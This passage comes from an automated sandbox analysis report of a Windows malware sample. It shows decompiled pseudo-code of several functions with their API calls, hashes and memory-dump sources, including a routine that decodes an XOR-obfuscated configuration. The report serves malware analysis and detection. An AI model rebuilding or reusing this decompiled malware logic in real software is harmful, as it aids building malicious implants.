                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ComputerHeapName$AllocateFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 187446995-0
                                                                                                            • Opcode ID: c0cbbf41dc80a6148ebc7b4b56b632a7df5cfa83fa25cd30085709b4bc517e8d
                                                                                                            • Instruction ID: 1b692a78eb2963651773794898ba5bae49bb6c4c062c5f9fd73e014ca2a402a8
                                                                                                            • Opcode Fuzzy Hash: c0cbbf41dc80a6148ebc7b4b56b632a7df5cfa83fa25cd30085709b4bc517e8d
                                                                                                            • Instruction Fuzzy Hash: 82F0B43A611205FAEB10E69A8D01FEF77FCDBCA615F140055E900D7140EA70DA018670
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030318D8, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x303d274) == 0) {
						E03034450();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x303d274) == 1) {
						_t10 = E0303262F(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                                                                            0x030318df
                                                                                                            0x030318e0
                                                                                                            0x030318e3
                                                                                                            0x03031915
                                                                                                            0x03031917
                                                                                                            0x03031917
                                                                                                            0x030318e5
                                                                                                            0x030318e6
                                                                                                            0x030318fb
                                                                                                            0x03031902
                                                                                                            0x03031904
                                                                                                            0x03031904
                                                                                                            0x03031902
                                                                                                            0x030318e6
                                                                                                            0x0303191f

                                                                                                            APIs
                                                                                                            • InterlockedIncrement.KERNEL32(0303D274), ref: 030318ED
                                                                                                              • Part of subcall function 0303262F: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,03031900,?), ref: 03032642
                                                                                                            • InterlockedDecrement.KERNEL32(0303D274), ref: 0303190D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                            • String ID:
                                                                                                            • API String ID: 3834848776-0
                                                                                                            • Opcode ID: 657f0a87d895f36fe3b64542c9d856cbd6e5d6f2a7668b79a68951e6c1340219
                                                                                                            • Instruction ID: dd8e202457b3bda60c2a7c444c16e0c4829d3ef052fa5d7f2a33cecaad433a98
                                                                                                            • Opcode Fuzzy Hash: 657f0a87d895f36fe3b64542c9d856cbd6e5d6f2a7668b79a68951e6c1340219
                                                                                                            • Instruction Fuzzy Hash: 13E0DF39347223BBCB79FA70880579FEA8CAB1B680F084932A482D502AC210C4818291
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03031E47, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 34%
                                                                                                            			E03031E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x303d2e0; // 0x22da5a8
				_t4 = _t15 + 0x303e39c; // 0x5318944
				_t20 = _t4;
				_t6 = _t15 + 0x303e124; // 0x650047
				_t17 = E0303144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E030325D6(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                                                                            0x03031e51
                                                                                                            0x03031e58
                                                                                                            0x03031e59
                                                                                                            0x03031e5a
                                                                                                            0x03031e5b
                                                                                                            0x03031e61
                                                                                                            0x03031e66
                                                                                                            0x03031e66
                                                                                                            0x03031e70
                                                                                                            0x03031e82
                                                                                                            0x03031e89
                                                                                                            0x03031eb7
                                                                                                            0x03031e8b
                                                                                                            0x03031e8d
                                                                                                            0x03031e92
                                                                                                            0x03031eb4
                                                                                                            0x03031e94
                                                                                                            0x03031e97
                                                                                                            0x03031e9e
                                                                                                            0x03031ea3
                                                                                                            0x03031ea5
                                                                                                            0x03031ea5
                                                                                                            0x03031eaa
                                                                                                            0x03031eaa
                                                                                                            0x03031e92
                                                                                                            0x03031ebe

                                                                                                            APIs
                                                                                                              • Part of subcall function 0303144D: SysFreeString.OLEAUT32(?), ref: 0303152C
                                                                                                              • Part of subcall function 030325D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,0303474F,004F0053,00000000,?), ref: 030325DF
                                                                                                              • Part of subcall function 030325D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,0303474F,004F0053,00000000,?), ref: 03032609
                                                                                                              • Part of subcall function 030325D6: memset.NTDLL ref: 0303261D
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03031EAA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$lstrlenmemcpymemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 397948122-0
                                                                                                            • Opcode ID: 846b9cad890a182945518300ae5f95af50f108929cb475a098822eba84bb3199
                                                                                                            • Instruction ID: 1cbc00deb39b69de7f02b673ae41ac053be4ec5cc7108ccab8efb53b35764ce8
                                                                                                            • Opcode Fuzzy Hash: 846b9cad890a182945518300ae5f95af50f108929cb475a098822eba84bb3199
                                                                                                            • Instruction Fuzzy Hash: 4E015E32906119BBDB55EBA8DC04AEEBBBDFF4A250F008625E901E7160D771A911C791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09146E, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,6F0DA0D4,00000000), ref: 6F0914AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction ID: 102dfec6744d56ac5575113623db97253016d7f2ccc805435d2adfd98f5a0dc4
                                                                                                            • Opcode Fuzzy Hash: 3bdbbbb922a4d72496aa8c277c75cfbc11930e54c4ef02e0cfe0f89890733d3e
                                                                                                            • Instruction Fuzzy Hash: B1F0E931789A2456EB119A768804F9F37DDAF4A770B119262EC28DB1C0EB34E801A6E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F055C56, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlEncodePointer.NTDLL(?), ref: 6F055C69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: EncodePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2118026453-0
                                                                                                            • Opcode ID: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction ID: 18d34cb1b9aa7f214233c6aead2b22566878d65c0e47463362096e6cac607536
                                                                                                            • Opcode Fuzzy Hash: 2ebb6d7158f1e18b6a3771e2059e40d700e2a90f63e9c6a96261b371881faa7b
                                                                                                            • Instruction Fuzzy Hash: 26D092B0008E199BDF049F44EC047643FB4F706376F604229E81D83296D7315470EA44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303AB16, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303AB16() {

				E0303ABF6(0x303c344, 0x303d124); // executed
				goto __eax;
			}



                                                                                                            0x0303ab28
                                                                                                            0x0303ab2f

                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0303AB28
                                                                                                              • Part of subcall function 0303ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0303AC6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 123106877-0
                                                                                                            • Opcode ID: d31956259cd5d77e6f78f36ca1038c62dbaa6c01e435e192a9fd0ed82ad5cebe
                                                                                                            • Instruction ID: 7dd5650d74ff3b19f9431b5d1e02c6c8932dfc8a1f24d804d39c61339234bd71
                                                                                                            • Opcode Fuzzy Hash: d31956259cd5d77e6f78f36ca1038c62dbaa6c01e435e192a9fd0ed82ad5cebe
                                                                                                            • Instruction Fuzzy Hash: D1B012A537B101BDF00CD11D5D12D3F028DC0C3A103208C1BF840DC002D9615C410036
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303AB31, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303AB31() {

				E0303ABF6(0x303c344, 0x303d134); // executed
				goto __eax;
			}



                                                                                                            0x0303ab28
                                                                                                            0x0303ab2f

                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0303AB28
                                                                                                              • Part of subcall function 0303ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0303AC6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 123106877-0
                                                                                                            • Opcode ID: 215f3688efb5d7014fc981083b917808d37584f23047cfd3b1977b8bb42f87ab
                                                                                                            • Instruction ID: 324283f10b88b4470c1067e254b4893c8c23718e65b2bc91047d5b636e13ccb6
                                                                                                            • Opcode Fuzzy Hash: 215f3688efb5d7014fc981083b917808d37584f23047cfd3b1977b8bb42f87ab
                                                                                                            • Instruction Fuzzy Hash: ADB0128937B101BDF108D11D5D12D3F024EC0C3910320881BF840CC102D8604C410132
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030375F6, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E030375F6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x303d270, 0, _a4); // executed
				return _t2;
			}




                                                                                                            0x03037602
                                                                                                            0x03037608

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: eadb5a5807a269c08dbebfbb49071fafeaf40b1598d82beab409953a5396e087
                                                                                                            • Instruction ID: 59337dd94edeafbe31f03b836697ef803702e150cf28f5ce7229d9b290ad301f
                                                                                                            • Opcode Fuzzy Hash: eadb5a5807a269c08dbebfbb49071fafeaf40b1598d82beab409953a5396e087
                                                                                                            • Instruction Fuzzy Hash: F4B01272005100ABDE11AB10DE08F057B35B760700F014011B20490068C2358434EB04
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03035DDA, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03035DDA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E03031138(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E030358AE(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                                                                                            0x03035de2
                                                                                                            0x03035dfc
                                                                                                            0x00000000
                                                                                                            0x03035e18
                                                                                                            0x03035df3
                                                                                                            0x03035dfa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03035e1f

                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,?,?,030329F4,3D0303C0,80000002,03032197,0303258B,74666F53,4D4C4B48,0303258B,?,3D0303C0,80000002,03032197,?), ref: 03035DFF
                                                                                                              • Part of subcall function 030358AE: SysAllocString.OLEAUT32(0303258B), ref: 030358C7
                                                                                                              • Part of subcall function 030358AE: SysFreeString.OLEAUT32(00000000), ref: 03035908
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFreelstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808004451-0
                                                                                                            • Opcode ID: f6374a5f71e64dc9acd07d3150556e1af761588ca0605441f44d2e5f86387bd3
                                                                                                            • Instruction ID: df6962e36c2859c8548272074a1bc80fb949e2cdb7e142ae3b5e01a4d948a705
                                                                                                            • Opcode Fuzzy Hash: f6374a5f71e64dc9acd07d3150556e1af761588ca0605441f44d2e5f86387bd3
                                                                                                            • Instruction Fuzzy Hash: B2F09B3600120EBFDF16AF90DC05EEA7FAAEF0A750F048415BA1458071DB72C9B1EBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 03034C40, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 258memoryCOMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 96%
                                                                                                            			E03034C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x303d2dc; // 0x69b25f44
				if(E03035657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x303d310 = _v8;
				}
				_t33 =  *0x303d2dc; // 0x69b25f44
				if(E03035657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x303d2dc; // 0x69b25f44
				if(E03035657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x303d270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x303d2dc; // 0x69b25f44
						_t45 = E03033BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x303d278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x303d2dc; // 0x69b25f44
						_t46 = E03033BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x303d27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x303d2dc; // 0x69b25f44
						_t47 = E03033BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x303d280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x303d2dc; // 0x69b25f44
						_t48 = E03033BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x303d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x303d2dc; // 0x69b25f44
						_t49 = E03033BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x303d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x303d2dc; // 0x69b25f44
						_t50 = E03033BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x303d284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x303d2dc; // 0x69b25f44
								_t51 = E03033BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E030349B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E03034B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x303d2dc; // 0x69b25f44
								_t52 = E03033BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E030349B8(0, _t52) != 0) {
								_t121 =  *0x303d364; // 0x53195b0
								E03039311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x303d2dc; // 0x69b25f44
								_t53 = E03033BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x303d2e0; // 0x22da5a8
								_t22 = _t54 + 0x303e252; // 0x616d692f
								 *0x303d30c = _t22;
								goto L60;
							} else {
								_t64 = E030349B8(0, _t53);
								 *0x303d30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x303d2dc; // 0x69b25f44
										_t56 = E03033BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x303d2e0; // 0x22da5a8
										_t23 = _t57 + 0x303e79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E030349B8(0, _t56);
									}
									 *0x303d380 = _t58;
									HeapFree( *0x303d270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}






































                                                                                                            0x03034c40
                                                                                                            0x03034c43
                                                                                                            0x03034c63
                                                                                                            0x03034c71
                                                                                                            0x03034c71
                                                                                                            0x03034c76
                                                                                                            0x03034c90
                                                                                                            0x03034ef8
                                                                                                            0x03034eff
                                                                                                            0x03034f06
                                                                                                            0x03034f06
                                                                                                            0x03034c96
                                                                                                            0x03034cb2
                                                                                                            0x03034ee6
                                                                                                            0x03034ef0
                                                                                                            0x00000000
                                                                                                            0x03034cb8
                                                                                                            0x03034cb8
                                                                                                            0x03034cbd
                                                                                                            0x03034cd3
                                                                                                            0x03034cbf
                                                                                                            0x03034cbf
                                                                                                            0x03034ccc
                                                                                                            0x03034ccc
                                                                                                            0x03034cdd
                                                                                                            0x03034cdf
                                                                                                            0x03034ce9
                                                                                                            0x03034cee
                                                                                                            0x03034cee
                                                                                                            0x03034ce9
                                                                                                            0x03034cf5
                                                                                                            0x03034d0b
                                                                                                            0x03034cf7
                                                                                                            0x03034cf7
                                                                                                            0x03034d04
                                                                                                            0x03034d04
                                                                                                            0x03034d0f
                                                                                                            0x03034d11
                                                                                                            0x03034d1b
                                                                                                            0x03034d20
                                                                                                            0x03034d20
                                                                                                            0x03034d1b
                                                                                                            0x03034d27
                                                                                                            0x03034d3d
                                                                                                            0x03034d29
                                                                                                            0x03034d29
                                                                                                            0x03034d36
                                                                                                            0x03034d36
                                                                                                            0x03034d41
                                                                                                            0x03034d43
                                                                                                            0x03034d4d
                                                                                                            0x03034d52
                                                                                                            0x03034d52
                                                                                                            0x03034d4d
                                                                                                            0x03034d59
                                                                                                            0x03034d6f
                                                                                                            0x03034d5b
                                                                                                            0x03034d5b
                                                                                                            0x03034d68
                                                                                                            0x03034d68
                                                                                                            0x03034d73
                                                                                                            0x03034d75
                                                                                                            0x03034d7f
                                                                                                            0x03034d84
                                                                                                            0x03034d84
                                                                                                            0x03034d7f
                                                                                                            0x03034d8b
                                                                                                            0x03034da1
                                                                                                            0x03034d8d
                                                                                                            0x03034d8d
                                                                                                            0x03034d9a
                                                                                                            0x03034d9a
                                                                                                            0x03034da5
                                                                                                            0x03034da7
                                                                                                            0x03034db1
                                                                                                            0x03034db6
                                                                                                            0x03034db6
                                                                                                            0x03034db1
                                                                                                            0x03034dbd
                                                                                                            0x03034dd3
                                                                                                            0x03034dbf
                                                                                                            0x03034dbf
                                                                                                            0x03034dcc
                                                                                                            0x03034dcc
                                                                                                            0x03034dd7
                                                                                                            0x03034dea
                                                                                                            0x03034dea
                                                                                                            0x00000000
                                                                                                            0x03034dd9
                                                                                                            0x03034dd9
                                                                                                            0x03034de3
                                                                                                            0x00000000
                                                                                                            0x03034df4
                                                                                                            0x03034df4
                                                                                                            0x03034df6
                                                                                                            0x03034e0c
                                                                                                            0x03034df8
                                                                                                            0x03034df8
                                                                                                            0x03034e05
                                                                                                            0x03034e05
                                                                                                            0x03034e10
                                                                                                            0x03034e12
                                                                                                            0x03034e15
                                                                                                            0x03034e16
                                                                                                            0x03034e1d
                                                                                                            0x03034e1f
                                                                                                            0x03034e20
                                                                                                            0x03034e20
                                                                                                            0x03034e1d
                                                                                                            0x03034e27
                                                                                                            0x03034e3d
                                                                                                            0x03034e29
                                                                                                            0x03034e29
                                                                                                            0x03034e36
                                                                                                            0x03034e36
                                                                                                            0x03034e41
                                                                                                            0x03034e4f
                                                                                                            0x03034e59
                                                                                                            0x03034e59
                                                                                                            0x03034e60
                                                                                                            0x03034e76
                                                                                                            0x03034e62
                                                                                                            0x03034e62
                                                                                                            0x03034e6f
                                                                                                            0x03034e6f
                                                                                                            0x03034e7a
                                                                                                            0x03034e8d
                                                                                                            0x03034e8d
                                                                                                            0x03034e92
                                                                                                            0x03034e98
                                                                                                            0x00000000
                                                                                                            0x03034e7c
                                                                                                            0x03034e7f
                                                                                                            0x03034e84
                                                                                                            0x03034e8b
                                                                                                            0x03034e9d
                                                                                                            0x03034e9f
                                                                                                            0x03034eb5
                                                                                                            0x03034ea1
                                                                                                            0x03034ea1
                                                                                                            0x03034eae
                                                                                                            0x03034eae
                                                                                                            0x03034eb9
                                                                                                            0x03034ec5
                                                                                                            0x03034eca
                                                                                                            0x03034eca
                                                                                                            0x03034ebb
                                                                                                            0x03034ebe
                                                                                                            0x03034ebe
                                                                                                            0x03034ed8
                                                                                                            0x03034edd
                                                                                                            0x03034ee3
                                                                                                            0x00000000
                                                                                                            0x03034ee3
                                                                                                            0x00000000
                                                                                                            0x03034e8b
                                                                                                            0x03034e7a
                                                                                                            0x03034de3
                                                                                                            0x03034dd7

                                                                                                            APIs
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034CE5
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034D17
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034D49
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034D7B
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034DAD
                                                                                                            • StrToIntExA.SHLWAPI(00000000,00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008), ref: 03034DDF
                                                                                                            • HeapFree.KERNEL32(00000000,03035390,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008,?,03035390), ref: 03034EDD
                                                                                                            • HeapFree.KERNEL32(00000000,?,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005,0303D00C,00000008,?,03035390), ref: 03034EF0
                                                                                                              • Part of subcall function 030349B8: lstrlen.KERNEL32(69B25F44,00000000,767FD3B0,03035390,03034EC3,00000000,03035390,?,69B25F44,?,03035390,69B25F44,?,03035390,69B25F44,00000005), ref: 030349C1
                                                                                                              • Part of subcall function 030349B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,03035390), ref: 030349E4
                                                                                                              • Part of subcall function 030349B8: memset.NTDLL ref: 030349F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
